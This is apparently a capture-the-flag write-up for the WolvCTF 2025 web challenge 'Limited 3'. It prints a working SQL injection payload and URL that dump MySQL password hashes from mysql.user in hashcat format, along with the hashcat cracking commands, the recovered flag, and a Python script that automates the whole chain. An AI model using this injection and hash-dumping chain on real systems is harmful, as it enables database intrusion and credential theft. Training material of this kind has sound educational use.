🌐 Limited 3

A detailed write-up of the Web challenge 'Limited 3' from WolvCTF - 2025

/images/WolvCTF-2025/Web/Limited3/challenge_presentation.png
Challenge Presentation

📊 Challenge Overview

| Category | Details | Additional Info |
|---|---|---|
| 🏆 Event | WolvCTF - 2025 | Event Link |
| 🔰 Category | Web | 🌐 |
| 💎 Points | 483 | Out of 500 total |
| ⭐ Difficulty | 🟢 Easy | Personal Rating: 3/10 |
| 👤 Author | SamXML | Profile |
| 🎮 Solves (at the time of flag submission) | 21 | solve rate |
| 📅 Date | 23-03-2025 | WolvCTF - 2025 |
| 🦾 Solved By | mH4ck3r0n3 | Team: QnQSec |

📝 Challenge Information

Note: This uses the same source as Limited 1. There is a db user named: flag The password for this user is 13 characters and can be found in rockyou. Please wrap this password with wctf{} before submitting. For example, if the password was hocuspocus123 then the flag would be wctf{hocuspocus123} https://limited-app-974780027560.us-east5.run.app/

🎯 Challenge Files & Infrastructure

Provided Files

Files: none. The challenge reuses the source of Limited 1 (see that writeup); only the instance URL from the description is needed.

🔍 Initial Analysis

First Steps

This is the third challenge of the Limited series and shares its source with Limited 1, so for the source review and the analysis of the injection point refer to the previous two writeups (Limited 1, Limited 2). Here we move directly to exploitation.

🔬 Vulnerability Analysis

Potential Vulnerabilities

  • SQL Injection: the price_op parameter opens a /* comment, and a limit value starting with */ closes it, so a UNION SELECT appended to limit reaches the query unfiltered.

🎯 Solution Path

Exploitation Steps

Initial setup

I must admit that after many attempts at extracting the password hash and several cracking runs that went nowhere (the hash simply cannot crack if it is not in the format hashcat expects), I found a query on the hashcat wiki that extracts MySQL caching_sha2_password hashes already in the layout required by hashcat mode 7401 (MySQL $A$ sha256crypt). Let's move on to the next phase.

Exploitation

I modified the initial query from the other challenges, adapting it to the one found on the hashcat wiki, forming the final payload:

*/ 1 UNION SELECT 1, 1, CONCAT(user, '|$mysql', SUBSTR(authentication_string,1,3), LPAD(CONV(SUBSTR(authentication_string,4,3),16,10),4,0), '*', INSERT(HEX(SUBSTR(authentication_string,8)),41,0,'*')), 1 FROM mysql.user WHERE plugin='caching_sha2_password' AND authentication_string NOT LIKE '%INVALIDSALTANDPASSWORD%' -- 

The CONCAT rewrites MySQL's stored string, $A$<three hex digits>$<20-byte salt><digest>, into the $mysql$A$<iterations>*<salt hex>*<digest hex> layout: SUBSTR(...,4,3) takes the hex iteration field and CONV/LPAD turn it into a four-digit decimal, HEX(SUBSTR(...,8)) hex-encodes everything after the third $, and INSERT(...,41,0,'*') drops a * after the first 40 hex characters, i.e. right after the 20-byte salt. The leading CONCAT(user, '|...') prefixes each hash with its username so the row for the flag user can be picked out of the output, and the NOT LIKE clause skips locked accounts.

Then I built the following link (the browser URL-encodes the spaces and comment markers):

https://limited-app-974780027560.us-east5.run.app/query?price=10.00&price_op=< /*&limit=*/ 1 UNION SELECT 1, 1, CONCAT(user, '|$mysql', SUBSTR(authentication_string,1,3), LPAD(CONV(SUBSTR(authentication_string,4,3),16,10),4,0), '*', INSERT(HEX(SUBSTR(authentication_string,8)),41,0,'*')), 1 FROM mysql.user WHERE plugin='caching_sha2_password' AND authentication_string NOT LIKE '%INVALIDSALTANDPASSWORD%' -- 

Visiting the page:

/images/WolvCTF-2025/Web/Limited3/password_hashes.png
Password Hashes

I found the password hashes, already in the correct format for hashcat. Since the challenge description states that the password is in rockyou.txt and is exactly 13 characters long, I filtered rockyou.txt down to 13-character entries with awk, which shrinks the candidate list considerably:

awk 'length($0) == 13' /usr/share/wordlists/rockyou.txt > rockyou13.txt

I saved the hash of the flag user (only the part after flag|, since the query prefixes each hash with its username) in a file called hash.txt and ran hashcat, which autodetects the hash mode for this format; the explicit equivalent is hashcat -m 7401 -a 0 hash.txt rockyou13.txt:

hashcat hash.txt rockyou13.txt

After waiting a few seconds, I obtained the plaintext password: maricrissarah. Finally, I formatted it in the flag format (wctf{maricrissarah}).

Flag capture

/images/WolvCTF-2025/Web/Limited3/manual_flag.png
Manual Flag

🛠️ Exploitation Process

Approach

The automated exploit performs all the steps described above, from the injection request through the wordlist filtering and hashcat run, and finally prints only the flag.
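The following is an added example, not the author's exploit script, showing the same chain in Python so it can be run offline: it builds the injection URL from the page's payload, reproduces the hashcat-wiki CONCAT() conversion in Python (useful to check what the SQL is doing, or to convert hashes dumped some other way), picks the flag user's hash out of the response text, filters the wordlist to 13-character candidates and wraps the hashcat run. The instance URL and the payload are the ones from the page; the authentication_string samples, the short wordlist and the hash.txt file name are constructed for the demo, and the crack() step is only exercised when hashcat is installed.

```python
"""Limited 3 chain in Python (added example; not the original exploit)."""
import re
import subprocess
from typing import Iterable, List, Optional
from urllib.parse import quote

BASE_URL = "https://limited-app-974780027560.us-east5.run.app"  # from the challenge text
HASHCAT_MODE = "7401"  # hashcat: MySQL $A$ (sha256crypt)

# Same payload as in the writeup: the leading */ closes the comment opened by price_op.
EXTRACT_PAYLOAD = (
    "*/ 1 UNION SELECT 1, 1, CONCAT(user, '|$mysql', "
    "SUBSTR(authentication_string,1,3), "
    "LPAD(CONV(SUBSTR(authentication_string,4,3),16,10),4,0), '*', "
    "INSERT(HEX(SUBSTR(authentication_string,8)),41,0,'*')), 1 "
    "FROM mysql.user WHERE plugin='caching_sha2_password' "
    "AND authentication_string NOT LIKE '%INVALIDSALTANDPASSWORD%' -- "
)

# Lines look like  <user>|$mysql$A$<iter>*<40 hex salt>*<hex digest>
HASH_LINE = re.compile(r"([A-Za-z0-9_.-]+)\|(\$mysql\$A\$\d+\*[0-9A-F]{40}\*[0-9A-F]+)")


def build_injection_url(base: str = BASE_URL, payload: str = EXTRACT_PAYLOAD) -> str:
    """price_op=`< /*` opens a comment; limit=`*/ ...` closes it and appends the UNION."""
    return (f"{base}/query?price=10.00&price_op={quote('< /*', safe='')}"
            f"&limit={quote(payload, safe='')}")


def mysql_sha2_to_hashcat(auth: bytes) -> str:
    """Python twin of the SQL CONCAT(): $A$<hex iter>$<20-byte salt><digest>
    becomes $mysql$A$<4-digit decimal iter>*<salt hex>*<digest hex>."""
    if not auth.startswith(b"$A$") or auth[6:7] != b"$":
        raise ValueError("not a caching_sha2_password authentication_string")
    # LPAD(CONV(SUBSTR(auth,4,3),16,10),4,0): hex field -> zero-padded decimal
    iterations = f"{int(auth[3:6].decode('ascii'), 16):04d}"
    rest = auth[7:].hex().upper()  # HEX(SUBSTR(auth,8)): salt + digest, uppercase hex
    if len(rest) <= 40:
        raise ValueError("salt or digest missing")
    # INSERT(..., 41, 0, '*'): a '*' after the first 40 hex chars (the 20-byte salt)
    return f"$mysql$A${iterations}*{rest[:40]}*{rest[40:]}"


def pick_user_hash(response_text: str, user: str) -> Optional[str]:
    """Return the hashcat-ready hash for `user` from the page text, or None."""
    for name, h in HASH_LINE.findall(response_text):
        if name == user:
            return h
    return None


def filter_by_length(words: Iterable[str], length: int) -> List[str]:
    """Equivalent of: awk 'length($0) == 13' rockyou.txt > rockyou13.txt"""
    return [w for w in (x.rstrip("\r\n") for x in words) if len(w) == length]


def crack(hash_value: str, wordlist: str, hash_file: str = "hash.txt") -> Optional[str]:
    """Run hashcat on one hash and read the plaintext back with --show.
    Needs hashcat on PATH; not invoked by the offline demo below."""
    with open(hash_file, "w", encoding="utf-8") as fh:
        fh.write(hash_value + "\n")
    subprocess.run(["hashcat", "-m", HASHCAT_MODE, "-a", "0", "--quiet", hash_file, wordlist])
    shown = subprocess.run(["hashcat", "-m", HASHCAT_MODE, "--show", hash_file],
                           capture_output=True, text=True).stdout
    for line in shown.splitlines():  # --show prints <hash>:<plaintext>
        if line.startswith(hash_value + ":"):
            return line[len(hash_value) + 1:]
    return None


def to_flag(password: str) -> str:
    """Wrap the recovered password in the flag format from the challenge text."""
    return f"wctf{{{password}}}"


if __name__ == "__main__":
    # Constructed samples: default 0x005 iteration field, 20-byte salt, dummy 43-char digest.
    root_auth = b"$A$005$" + bytes(range(1, 21)) + b"A" * 43
    flag_auth = b"$A$005$" + bytes(range(21, 41)) + b"B" * 43
    fake_page = "root|" + mysql_sha2_to_hashcat(root_auth) + "\nflag|" + mysql_sha2_to_hashcat(flag_auth)
    print(build_injection_url())
    print(pick_user_hash(fake_page, "flag"))
    print(filter_by_length(["hocuspocus123", "short", "maricrissarah"], 13))
    print(to_flag("maricrissarah"))
```

The conversion is written on bytes on purpose: the 20-byte salt in authentication_string is raw binary, so the hex form is the only safe way to carry it into a hash file, which is exactly why the SQL payload calls HEX() rather than dumping the column as text.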

🚩 Flag Capture

Flag

wctf{maricrissarah}

Proof of Execution

/images/WolvCTF-2025/Web/Limited3/automated_flag.png
Automated Flag
Screenshot of successful exploitation

🔧 Tools Used

| Tool | Purpose |
|---|---|
| Python | Exploit |
| HashCat | Password Cracking |

💡 Key Learnings

Time Optimization

  • When extracting MySQL 8+ caching_sha2_password hashes, use the extraction query from the hashcat wiki: the raw authentication_string is not in a format hashcat accepts, and the query rewrites it into the -m 7401 layout, so no cracking time is wasted on an unparseable hash.

Skills Improved

  • Web Exploitation (SQL injection)
  • Password Cracking (hashcat)

📊 Final Statistics

| Metric | Value | Notes |
|---|---|---|
| Time to Solve | 00:30 | From start to flag |
| Global Ranking (at the time of flag submission) | 17/351 | Challenge ranking |
| Points Earned | 483 | Team contribution |

Created: 23-03-2025 • Last Modified: 23-03-2025 Author: mH4ck3r0n3 • Team: QnQSec